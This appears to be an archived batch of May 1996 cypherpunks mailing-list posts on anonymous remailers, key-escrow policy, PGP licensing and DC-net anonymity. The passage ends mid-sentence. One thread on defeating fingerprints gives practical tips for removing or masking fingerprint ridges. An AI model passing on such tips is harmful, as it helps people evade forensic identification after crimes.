Message-ID: <199605171818.NAA03531@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> > The problem that I think the Scientology postings raise is that the
> > remailers cannot really be used to post copyrighted material.  That is
> > what got the netherlands hacktic remailer shut down.  This shows, BTW,
> > that being outside the United States is no guarantee of immunity.  Most
> > Western countries support copyrights.
> [snip]
> 
> I find this all very odd, since the Dutch court ruled that the use of the
> Fishman affidavit on Karin Spaink's web page was not a copyright
> violation, as Fishman was part of a US judicial record.  I'm assuming
> that the Fishman material is what thay approched Hacktic about, as well, but
> I'm not sure.  Maybe this is about something else (the NOTS materials), or
> maybe the threat of legal action was enough to do Hacktic in, despite what
> would seem to be a favorable precedent.

The problem is more funadmental than copyrights or the specifics of this 
case.  It might be true that Hacktic could win in court, but why should 
Hacktic take the chance?  Or spend the money to prove their case?

The remailer net won't stand up to challenges of any strength because no
one gets anything for running a remailer.  It doesn't matter if the
challenges are strong enough to win, or if they ultimately have any merit. 
If you don't get anything for winning and you'll get burned if you lose,
the expected value of the game is negative no matter how unlikely losing 
is.

If you want the remailer system to stand up you have to make the expected
value positive.  The expected value of bookmaking is positive, even though
it's illegal to take sports bets in most states.  As a consequence it's
not hard to find someone to take a bet.  Individual bookies may come and
go, but the system will always be there.  If the expected value of running
a remailer was positive, the remailer system would thrive even if it was
illegal to run one.

To make the expected value positive, you have to (a) make it profitable to
run a remailer, and (b) set up a protocol that gives someone who runs one
a fighting chance of not getting busted.  (a) is easy enough in theory,
but I don't know how you could do (b), at least not if you wanted to let
people do public things with the remailers (like post to usenet). 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Voorhees" <mark@infolawalert.com>
Date: Sat, 18 May 1996 21:55:10 +0800
To: "cypherpunks@toad.com>
Subject: Zimmermann v. ViaCrypt???
Message-ID: <199605171721.NAA17938@park.interport.net>
MIME-Version: 1.0
Content-Type: text/plain


Read

http://infolawalert.com/stories/051796a.html

for a story on how Phil Zimmermann is trying to
retrieve all the rights to PGP from ViaCrypt
in order to jump start his new venture, PGP, Inc.

He's taking a sell out or get sued approach with
ViaCrypt, which until recently has not had much
success marketing PGP.

Mark

PS--Apologies in advance if this has been posted
before.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 19 May 1996 04:16:43 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: Any DLL's that handle Public Key Encryption or Key Exchange?
Message-ID: <199605172034.NAA11507@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 5/17/96 +1200, pgut001@cs.auckland.ac.nz wrote:
>  The second is that if you're in the US you're probably going to run 
>into legal hassles using this code unless someone wants to do an
>alternative RSAREF implementation which you can plug in in place of the
>existing RSA code.

There's an RSAEURO drop-in clone of RSAREF that's on ftp.ox.ac.uk,
so you could write a version of your software that lets Yankees and
non-Yankees drop in whichever version is appropriate without worrying
about patent or copyright problems.  Any* RSAREF system used in the US
has the problem that it's limited to the "official" interfaces,
which means you can't do fully general RSA without permission.

(* There was one RSAREF version that didn't insist on this in
its license; don't remember which one.)
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 19 May 1996 05:30:01 +0800
To: cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <199605172034.NAA11515@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:29 PM 5/15/96 -0400, Black Unicorn <unicorn@schloss.li> wrote:
>I would really like to see a remailer that is somehow blinded.
>I don't know enough about how mail paths are generatered, but is it
>impossible to conceal the origin of remailer postings?

One reason for remailers is that concealing message origin is difficult and
unreliable, and making smtp servers that include all the information they
can find about the origin of a message into the message is easy,
so it's tough to lie about where you are.  Remailers solve that by
removing the header information from messages they receive and shipping
out the message body with new headers, so anyone who traces all the
"Received:" headers gets pointed to the remailer. 

>Postings made to remailernym@alpha.c2.org would be spit out somewhere but
>without accountability?

alpha.c2.org keeps encrypted reply blocks that it can't decrypt;
it sends messages to some other remailer that can decrypt them,
and only sends messages encrypted.
That means that anybody who does succeed in stealing or subpoenaing
alpha's user information has to go to each of the other remailers
it uses for delivery as well - and alpha doesn't have any keys to steal.

>I'd consider running a remailer, but after listening to the response to
>the anonymous poster a while back, it sounds like there are few if any
>simple options which do not require major time and effort to setup and
>run.

Setting up a remailer is easy, if you've got a Unix machine, 
and I'd guess that the Winsock Remailer is probably easy for Windows.
If you don't support mail-to-news yourself, and you block mail to
other mail-to-news gateways, you cut out lots of flame potential,
which keeps the work of running it fairly low.  (My remailer is based
on ghio2, which has traps to detect high-volume spam, which has
shut it down a couple of times.  Cleaning them up is annoying.)  
You do need to stay on remailer-operators@c2.org to get notices of 
individuals who are being spammed or harassed so you can block mail to them,
but that's typically 5-10 minutes/week.

If you've got a Unix machine, you can also do a web-based remailer easily
(users fill out a form with their mail, which goes to a CGI script.)
If you're willing to use somebody else's script, e.g. replay.com,
you can just put up the web page anywhere and won't need Unix,
and they can handle most of the spam-blocking. This isn't very secure 
unless you're using SSL or other secure HTTP protocol,
which I don't think any of the current web-remailers do. 
Some folks have put advertising on their remailer pages, which starts to 
be one economic model that can encourage people to run them,
if you can find advertisers who _want_ the image this gives them.
(This is fine for c2.org and maybe Digicash banks or tax-haven consultants,
some political ranters, and maybe phone-sex or other services that
don't have to worry about lowered reputations if somebody uses the
remailer to spam the alt.sex newsgroups with phone-sex ads :-)


#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Sun, 19 May 1996 06:50:21 +0800
To: cypherpunks@toad.com
Subject: Crypto-News: Congress tells Clinton "Dump key escrow/Clipper schemes" (5/17/96)
Message-ID: <199605171739.NAA29941@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


=============================================================================
          ____                  _              _   _                   
         / ___|_ __ _   _ _ __ | |_ ___       | \ | | _____      _____ 
        | |   | '__| | | | '_ \| __/ _ \ _____|  \| |/ _ \ \ /\ / / __|
        | |___| |  | |_| | |_) | || (_) |_____| |\  |  __/\ V  V /\__ \
         \____|_|   \__, | .__/ \__\___/      |_| \_|\___| \_/\_/ |___/
                    |___/|_|                                           

             TWENTY-SEVEN MEMBERS OF THE HOUSE OF REPRESENTATIVES
        URGE CLINTON TO ABANDON KEY ESCOW AND "IMMEDIATELY LIBERALIZE
             EXPORT CONTROLS ON ENCRYPTION PROGRAMS AND PRODUCTS" 

                           Date: May 17, 1996

         URL:http://www.crypto.com/            crypto-news@panix.com
           If you redistribute this, please do so in its entirety,
                         with the banner intact.
-----------------------------------------------------------------------------
Table of Contents
        News
        Text of letter from House members to President Clinton
        Text of press release from Rep. Goodlatte
        How to receive crypto-news

-----------------------------------------------------------------------------
NEWS

Today a band of twenty-seven House members signed a letter to President
Clinton urging him to abandon key escrow schemes, and immediately liberalize
export controls on encryption programs and products.

The letter argues that "a key escrow approach will not adequately address
security concerns", citing security as a "prerequisite to exploiting
the potential of the Global Information Infrastructure."

Rep. Goodlatte led many of the signatories on the letter to introduce and
cosponsor H.R. 3011, the Security and Freedom through Encryption (SAFE) Act"
earlier this year, which liberalizes export controls on encryption products.

Copies of the letter to the President, the press release, and H.R. 3011
can be found on the Encryption Policy Resource Page at http://www.crypto.com/

-----------------------------------------------------------------------------
TEXT OF LETTER FROM HOUSE MEMBERS TO PRESIDENT CLINTON

             Congress of the United States Washington, DC 20515

May 15, 1996


The Honorable William J. Clinton
The White House
Washington, D.C. 20500

Dear Mr. President:

 We are writing to ask you not to proceed with your Administration's key
escrow encryption policy proposal and instead to immediately liberalize
export controls on non-key escrow encryption programs and products.

 Many of us have sponsored H.R. 3011, the "Security and Freedom
Though Encryption (SAFE) Act" which would ensure the continued
ability of Americans to use and sell good encryption and would permit
the export of generally available software with encryption capabilities
and other such software and hardware under license when certain
conditions are met.  We understand that the Administration has developed
a key escrow encryption proposal and is not at this time willing to ease
export restrictions on encryption programs and products which are widely
available from domestic and foreign companies and the Internet.

 We share the concerns of a wide range of businesses and privacy interests
that a key escrow approach will not adequately address security concerns.
The ability of companies and individuals to ensure that the information they
send over communications and computer networks is secure is a prerequisite
to exploiting the potential of the Global Information Infrastructure.  For
example, U.S. small businesses are beginning to harness the Internet to enter
foreign markets.  The Internet in effect lowers the barriers to entry for
these companies.  But they will not be able to rely on the Internet if their
information is not secure.

 We also have serious concerns about the impact of the Administration's
policy on the U.S. economy and job creation.  (Indeed, it is our strong
belief the U.S. economic interests must be a primary consideration in
encryption policy discussions with other countries, the OECD, and in
other forums.  It is not clear that this has been the case in the
discussions held up to this point).

 A recent report entitled "A Study of the International Market for
Computer Software With Encryption" prepared by the U.S. Department of
Commerce and the National Security Agency indicated that U.S. companies
will lose market share given the availability of stronger encryption
products overseas.  The Computer Systems Policy Project estimates that
unless the U.S.  relaxes out-of-date export controls, the U.S.
technology industry will lose $60 billion in revenues and 200,000 jobs by
the year 2000.
        
 As Congress begins to consider H.R. 3011 we would greatly appreciate knowing
whether the Administration plans to publish a final rule implementing a key
escrow encryption proposal or, alternatively, will relax export controls on
encryption programs and products which do not have a key escrow feature.

                                        Sincerely,


Tom Campbell          Bob Goodlatte
Anna Eshoo            Eliot Engel
Zoe Lofgren           Bob Barr
Carlos Moorhead       Patricia Schroeder
Barney Frank          Sam Gejdenson
Howard Coble          Rick Boucher
Fred Heineman         Sonny Bono
Vernon Ehlers         Randy Cunningham
Charlie Norwood       Randy Tate
Donald Manzullo       Helen Chenoweth
Thomas Davis          Roscoe Bartlett
Sam Farr              Ken Calvert
Linda Smith           Joseph Moakley
Lynn Woolsey

-----------------------------------------------------------------------------
TEXT OF PRESS RELEASE FROM REP. GOODLATTE

NEWS FROM:  Congressman Bob Goodlatte
Virginia's 6th District
123 Cannon HOB
Washington, D.C. 25515
Phone: (202) 225-5431

DATE:  May 16, 1996

CONTACT:  Doug Clark  202-225-5431


REP. GOODLATTE ASKS PRESIDENT NOT TO PROCEED WITH ENCRYPTION POLICY

Congressman Bob Goodlatte (R-VA), lead sponsor of S.A.F.E., the Security and 
Freedom Through Encryption Act, was joined by Tom Campbell (R-CA), Zoe 
Lofgren (D-CA), Anne Eshoo (D-CA), Bob Barr (R-GA), Eliot Engle (D-NY), and 
a bipartisan group of 21 of their colleagues in the House in writing 
President Clinton asking him not to proceed with his Administration's key 
escrow encryption policy proposal and instead to immediately liberalize 
export controls on non-key escrow encryption programs and products.

&quot;I have received recent information that the Administration is 
circulating yet another version of a key escrow proposal for comments 
from selected individuals.  In my opinion this proposal is a non-starter and 
will not do.  It's just a back door approach for more big government 
intrusion into every American's privacy,&quot; said Goodlatte.

-----------------------------------------------------------------------------
HOW TO RECEIVE CRYPTO-NEWS

To subscribe to crypto-news, sign up from our WWW page (http://www.crypto.com)
or send mail to
majordomo@panix.com with "subscribe crypto-news" in the body of the
message.
-----------------------------------------------------------------------------
End crypto-news
=============================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Sat, 18 May 1996 19:57:13 +0800
To: ecarp@netcom.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605171622.MAA20895@dal1820.computek.net>
Message-ID: <199605171754.NAA02553@fuseki.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


"ec" == Ed Carp <erc@dal1820.computek.net> writes:

ec> I think it would help tremendously if elm or pine were hacked to
ec> allow for remailing.  Even better would be some sort of dynamic
ec> remailer addressing - sendmail certainly doesn't allow for this
ec> capability. :( I think we need something similar to dynamic
ec> routing for remailers.

  I do agree extending commonly used mailers would be helpful.

  Emacs + mailcrypt (with or without MH & mh-e) already provide the
means to chain one's message through type 1 or mixmaster type 2
remailers. mailcrypt will even choose arbitrary remailer routing for
you based on information gathered from Raph Levien's remailer
list. Unforunately this is not a turnkey solution and requires more
configuration than most users probably want.

michael

mailcrypt home page: http://cag-www.lcs.mit.edu/mailcrypt/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 19 May 1996 04:15:37 +0800
To: cypherpunks@toad.com
Subject: Remailers & what they get out of it...
Message-ID: <199605171909.OAA09791@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Alex Strasheim <cp@proust.suba.com>
> Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
> Date: Fri, 17 May 1996 13:18:24 -0500 (CDT)
> 
> The remailer net won't stand up to challenges of any strength because no
> one gets anything for running a remailer.  It doesn't matter if the
> challenges are strong enough to win, or if they ultimately have any merit. 
> If you don't get anything for winning and you'll get burned if you lose,
> the expected value of the game is negative no matter how unlikely losing 
> is.

As long as the remailer is run a 'grins & giggles' affair you are right.
The moment they are run as a business enterprise then the game changes.
Several of the Austin Cypherpunks and myself have set up a remailer here
in Austin (kourier.ssz.com) using MixMaster. The intent is that once we get
out of testing the software and other mods we are in the middle of we will
have a commercialy viable service. I am currently discussing with a couple
of local lawyers possible strategies we can employ if CoS or others start
legal motions. The idea that we are exploring is a defence by offence. One
aspect is 'work in progress' protection of both our development mods as well
as our customers work. I also hope to build part of the defence on the fact
that to bring the remailer down denies access to the public key-server which
is integrated into the remailer as a value-added service.

(NOTE: don't waste your time trying to get to kourier over the next few
       weeks. A more public announcement is in the works)

To me the biggest problem with the crypto work right now is that not enough
professionals are involved. If more remailers and such were initiated as 
a business there would be legal avenues to explore. Also, in this vain is
the apparent lack of support for commercial ventures by developers of such
apps as MixMaster (whose license explicity prohibits commercial use).

And for the record, yes, we expect to charge real $$$ for access. Our
current plan is $10/month for each account. Money orders prefered. We have
at this point pondered e-cash methods but it doesn't seem popular enough
at this juncture.

> If you want the remailer system to stand up you have to make the expected
> value positive.  The expected value of bookmaking is positive, even though
> it's illegal to take sports bets in most states.  As a consequence it's
> not hard to find someone to take a bet.  Individual bookies may come and
> go, but the system will always be there.  If the expected value of running
> a remailer was positive, the remailer system would thrive even if it was
> illegal to run one.
> 
> To make the expected value positive, you have to (a) make it profitable to
> run a remailer, and (b) set up a protocol that gives someone who runs one
> a fighting chance of not getting busted.  (a) is easy enough in theory,
> but I don't know how you could do (b), at least not if you wanted to let
> people do public things with the remailers (like post to usenet). 
> 

I agree with (a) completely. The way to make a remailer profitable is to
charge for access. As to (b), step one is get a lawyer on board from the get
go. One aspect of (b) is that it should be no more illegal for me to allow
my users to post to usenet anonymously via my guest account than to do it
via a remailer. In fact, one could argue that if anonymous remailers are
truly illegal then so are 'guest' or other demo accounts on systems that
don't get personal info (and verified at that) prior to accessing any system
services. This means that systems such as l0pht.com or ssz.com are illegal
to operate.


                                                        Jim Choate



                                    \\/////    "Don't have a cow, man"
                                    |     |  / 
                                    (.) (.)
      ===========================oOO==(_)==OOo==========================             

         Tivoli an IBM company                  CyberTects: SSZ
         Customer Support Engineer              SOHO Consulting/VR/Robotics

         9442 Capitol of Texas Highway North    1647 Rutland
         Suite 500                              #244  
         Austin, TX 78759                       Austin, TX  78758

         Email: jchoate@tivoli.com              Email: ravage@ssz.com
         Phone: (512) 436-8893                  Phone: (512) 259-2994
         Fax:   (512) 345-2784                  Fax: n/a
         WWW:   www.tivoli.com                  WWW: www.ssz.com
         Modem: n/a                             Modem: (512) 836-7374
         Pager: n/a                             Pager: n/a
         Cellular: n/a                          Cellular: n/a

      ===================================================================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sun, 19 May 1996 02:34:50 +0800
To: QUT@NET.CUM
Subject: Re: COMPLETELY ANONYMOUS POSTING & E-MAIL (fwd) [What BS]
In-Reply-To: <Pine.SUN.3.91.960516015120.25850A-100000@infinity.c2.org>
Message-ID: <199605172142.OAA14815@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ON
> 
> Posted in one of the sex newsgroups...
> 
> 
> In article <4n02a7$ime@newsbf02.news.aol.com> shhhnet@aol.com (ShhhNet) writes:
> From: shhhnet@aol.com (ShhhNet)
> Subject: COMPLETELY ANONYMOUS POSTING & E-MAIL
> Date: 10 May 1996 14:35:51 -0400
> 
> COMPLETELY ANONYMOUS POSTING & E-MAIL
> Send and receive E-Mail and Post to newsgroups with TOTAL anonymity  
> 
> As you must know the government is getting ready to crack down on freedom
> of speech on the internet.  Already people are being fined and imprisoned.
> Your service providers are being asked to turn over records and they are
> cooperating.  Even if they don't want to cooperate the can be forced by
> the courts to release records to the authorities.
> Our New Service let's you send and receive E-Mail and post to newsgroups
> with no fear of your messages ever being traced to you.  Not even a
> Federal Court Order will result in your identity being revealed.  Finally
> total safety for your most confidential or controversial electronic
> messages.
> 
> ShhhNET Will begin operating in late June and you can be a part of the
> only truly secure way to send and receive E-Mail or post to UseNet
> Newsgroups.  For a limited time ShhhNet will be offered for only $50.00
> per Year.  If you are interested, Please send E-Mail to ShhhNet@AOL.Com 
> We will respond with information about how our service works and how you
> can be totally secure in your Internet transactions.  

HOW BOGUS.  NO FURTHUR COMMENT OR FOLLOW=UP NESSESSARY.


--
SERENITY, ETC.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 18 May 1996 20:38:47 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Hackers soundtrack
Message-ID: <Pine.SUN.3.91.960517143822.12253A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Update on an old thread...

Apparently it was released last week in England, so it may be available 
in some import racks. 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sat, 18 May 1996 07:58:49 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: (Fwd) New Anonymous Remailer
In-Reply-To: <Pine.GUL.3.93.960515230516.5896E-100000@Networking.Stanford.EDU>
Message-ID: <Pine.3.89.9605171514.A9289-0100000@netcom18>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 15 May 1996, Rich Graves wrote:

> >     > To:            info-pascal@ARL.MIL

	Mail sent there gets forwarded to ibm.net

        xan

        jonathon
        grafolog@netcom.com



**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman)
Date: Sat, 18 May 1996 14:02:17 +0800
To: qut@netcom.com (Dave Harman)
Subject: Re: Defeating fingerprints
In-Reply-To: <Pine.LNX.3.93.960516192513.1235C-100000@smoke.suba.com>
Message-ID: <199605172219.PAA20898@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ON
> 
> On Tue, 14 May 1996, Be Good wrote:
> > > Burglars and safecrackers sand the ridges off.
> > 
> > This sounds like it'd work, but quite tedious.
> 
> 	Belt sander and a light touch.

I'm going to try this sanding experiment sometime.
When I get around to it, I'll post the results here.
(pressing hard with inkpad and paper)

Shellac or epoxy glue does NOT work, if the thickness is at all managable.
Tried it, The ridges always find a way to get through.
It also provides a weaker bond to dry skin than you'd expect.
The thicker the more likelihood of peeling off.
Even Krazy Glue. (The UL BS is false.)




--
Serenity, Etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bobpal@cdt.org (Bob Palacios)
Date: Sun, 19 May 1996 04:24:02 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.19 - 27 Reps Urge President to Abandon Key-Escrow EncryptionPolicy
Message-ID: <v02140b17adc2850fa050@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 19
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 19                           May 17, 1996

 CONTENTS: (1) 27 Representatives Urge President Clinton to Abandon Key-Escrow
               Encryption Policy
           (2) Join Sen Leahy At HotWired, Wed 5/22 to Discuss His Crypto Bill
           (3) Subscription Information
           (4) About CDT, contacting us

  ** This document may be redistributed freely with this banner in tact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
-----------------------------------------------------------------------------

(1) 27 REPRESENTATIVES URGE PRESIDENT CLINTON TO ABANDON KEY-ESCROW POLICY

A bi-partisan group of 27 Congressmen, led by Reps. Bob Goodlatte (R-VA)
and Tom Campbell (R-CA) on Wednesday (5/15) sent a letter to President
Clinton urging the President to abandon the Administration's key-escrow
encryption proposal and "instead immediately liberalize export controls on
non-key escrow encryption technology."

Expressing "serious concerns" about the impact of current U.S. encryption
policy on individual privacy and US competitiveness, the bi-partisan group
wrote: "The ability of companies and individuals to ensure that the
information they send over communications and computer networks is secure
is a prerequisite to exploiting the potential of the Global Information
Infrastructure."

The letter was signed by several prominent members from both parties,
including Bob Goodlatte (R-VA), Tom Campbell (R-CA), Anna Eshoo (D-CA),
Rick Boucher (D-VA), Bob Barr (R-GA), Pat Schroeder (D-CO), Carlos
Moorehead (R-CA), and 20 other members.

The bi-partisan call to President Clinton to abandon the Administration's
key escrow policy is yet another encouraging sign of increasingly strong
Congressional support for reform of US encryption policy.  Congress is
currently considering several bills designed to encourage the widespread
availability privacy-protecting technologies for the Internet by lifting
export controls on strong encryption:

* HR 3011, the "Security and Freedom Through Encryption (SAFE) Act of
  1996", sponsored by over 30 members including  Reps Goodlatte (R-VA),
  Campbell (R-CA), Eshoo (D-CA), Boucher (D-VA).

* S. 1726, the "Promotion of Commerce On-Line in the Digital Era (Pro-
  CODE) act of 1996, sponsored by Senators Burns (R-MT), Leahy (D-VT),
  Pressler (R-SD), Dole (R-KS), Wyden (D-OR), and Murray (D-WA)

* S. 1587, the "Encrypted Communications Privacy Act of 1996", also
  sponsored by Senators Burns and Leahy.

Hearings on HR 3011 (Rep Goodlatte's bill) and the Burns/Leahy S. 1726
(Pro-CODE) are expected in June.

INTERNET SECURITY DAY - A NATIONAL DISCUSSION ON THE NEED TO REFORM US
ENCRYPTION POLICY

In July, CDT and over 25 other organizations will hold a daylong education
event in California's Silicon Valley in July. The "Internet Security Day"
will bring together industry leaders, members of Congress, encryption
experts, and others to discuss the need to reform US encryption policy.
Similar events, to be held throughout the US and on the Net, are also being
planned.  Sponsors of the event include the Voters Telecommunications Watch
(VTW), EFF, Americans for Tax Reform, AT&T, Pacific Telesis, America
Online, Netscape, the Business Software Alliance, the Software Publishers
Association, and several others.

FOR MORE INFORMATION ON THE ENCRYPTION POLICY DEBATE & TEXT OF THE LETTER

Background information on the encryption policy debate, full text of the
various legislative proposals, detailed analysis, the text of the
Goodlatte/Campbell letter, information on the July Silicon Valley event,
and transcripts from online appearances by Senators on the Encryption
issue, can be found at CDT's Cryptography Issues Page:

 URL:http://www.cdt.org/crypto/

Or at the Encryption Policy Resource Page:

 URL:http://www.crypto.com/

---------------------------------------------------------------------
(2) SENATORS GO ONLINE TO DISCUSS PRIVACY AND SECURITY ONLINE

Senator Patrick Leahy (D-VT), the "Senior Senator from Cyberspace", ardent
proponent of Net.Freedom and co-sponsor of 2 bills to repeal encryption
export controls, will hold an online "town meeting" on Wednesday May 22 to
discuss privacy and security online.

DETAILS ON THE EVENT

* Wednesday May 22, 4 - 5 pm ET (1 pm Pacific) on HotWired

   URL: http://www.hotwired.com/wiredside/

 To participate, you must be a registered HotWired member (there
 is no charge for registration).  You must also have RealAudio(tm) and
 a telnet application properly configured to work with your browser.

 Please visit http://www.hotwired.com/wiredside/ for information on how you
 can easily register for Hotwired and obtain RealAudio.

Wednesday's town meeting is another in a series of planned events, and is
part of a broader project coordinated by CDT and the Voters
Telecommunications Watch (VTW) designed to bring the Internet Community
into the debate and encourage members of Congress to work with the
Net.community on vital Internet policy issues.

Events with other members of Congress working on Internet Policy Issues are
currently being planned. Please check http://www.crypto.com for
announcements of future events

------------------------------------------------------------------------
(3) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.19                                           5/17/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 18 May 1996 14:20:59 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) New Anonymous Remailer
In-Reply-To: <199605152317.SAA28399@cdale1.midwest.net>
Message-ID: <Pine.GUL.3.93.960517154102.16589C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


See http://aka-usa.com/

I'm not sure which is worse -- the "service," or the graphics.

Only $5/month for insecure mail forwarding!

But wait, there's more!

http://aka-usa.com/order.html

An insecure web form that takes credit cards! A ridicuous usage policy!

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sat, 18 May 1996 21:31:31 +0800
To: bryce@digicash.com
Subject: Re: found nym-differentiation! Still need perpetual motion, FTL travel, cold fusion
Message-ID: <v02140b01adc2c1d47286@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Bryce wrote:
>
>  "Perry Metzger" <perry@piermont.com> is alleged to have written:
> (> Bryce wrote:)
>
> > > Simple as pie, because of some of the properties of DC-Nets.
> > > If someone sends out the wrong number of pubkeys, then
> > > everyone will know, right?  So when that happens everyone
> > > just reveals their shared-secret data from the DC-Net
> > > session.
> >
> > And if several people lie about their shared secrets?

This is what secure bit-commitment is for.  The refinements to the DC-net
protocol since Chaum's original paper make this a non-issue if you are
willing to spend the CPU cycles to do all of the necessary work.

> If some of your N participants are going to collude to share
> their nyms then it is manifestly impossible to stop them.
> But that doesn't bother me.  The purpose of this scheme is
> to create N nyms for N people and be sure that each of then
> N people who wanted a nym got one.  If you are sure that
> each of the N people wanted a nym, then you can be sure you
> have a one-to-one mapping between people and nyms, but
> unconditional untraceability from nyms to people.

Or, to rephrase the question in a manner which my lead you to the solutions
which already exists for this problem:  You have an anonymous access channel
in which you need to do frame reservation such that each member can reserve
one and only one frame for the transmission phase which follows frame
reservation. You are both talking about disrupter detection in an anonymous
channel and it has already been solved...

> But perhaps what you were talking about was a
> denial-of-service attack on the DC-Net's network layer.
> That has been addressed extensively in Chaum's original
> "Dining Cryptographers" paper.  Chaum's method for dealing
> with denial-of-service attacks is typically brilliant, but
> even so it is an unwieldly and expensive (in terms of
> computation and bandwidth) proposition.  I recommend "Dining
> Cryptographers" to everyone, and I hope that someone who
> reads it will come up with a better solution.

They already have.  Actually, the trap method in Chaum's original paper
is both expensive and flawed.   Get a copy of EuroCrypt 89 and read
the DC nets papers in there by B. den Bos and by Michael Waidner.  If
you are in the Bay Area I have a copy of Pfitzmann and Waidner's "Dining
Cryptographers in the Disco: Unconditional Sender and Recipient Anonymity
with Computational Serviceability" which I would be happy to make copies of.
This is probably the most comprehensively secure DC-net scheme I am aware of;
although, like most Crypto papers, it is way more complicated and
computationally expensive than necessary for real life.

jim









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 18 May 1996 21:14:04 +0800
To: cypherpunks@toad.com
Subject: GEK_cod
Message-ID: <199605171630.QAA18952@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-17-96. WaPo: 
 
   "The Code Of the Geeks." 
 
   A longish lifestyles profile of Robert Hayden and his Geek 
   Code -- "a series of letters usually found on the bottom of 
   e-mail messages that, when deciphered, offer a snapshot of 
   the user's geekiness." 
 
      It's a way for geeks to scope out one another. But 
